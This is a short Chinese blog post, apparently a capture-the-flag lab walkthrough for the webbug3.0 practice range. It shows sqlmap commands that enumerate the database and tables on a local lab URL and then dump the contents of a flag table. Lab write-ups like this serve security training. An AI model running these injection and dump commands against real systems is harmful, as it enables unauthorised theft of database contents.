witer

webbug3.0靶场

目标一,由于用的kli系统,所以没有去手动注入,用了sqlmap来注入检测

先用sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" --current-db查看当前数据库得到数据库pentesterlab

然后查看当前数据库的表sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --table

一看这个flag表就知道肯定是它了

用sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns 看一下表里面的字段

看到有两个字段flag和id,直接暴flag字段内容

sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag --dump --batch
(--batch自动化不询问,--dump把结果导出)

 

 

posted on 2018-07-27 16:51 莫违 阅读(...) 评论(...) 编辑 收藏
 
 

分类:

技术点:

相关文章: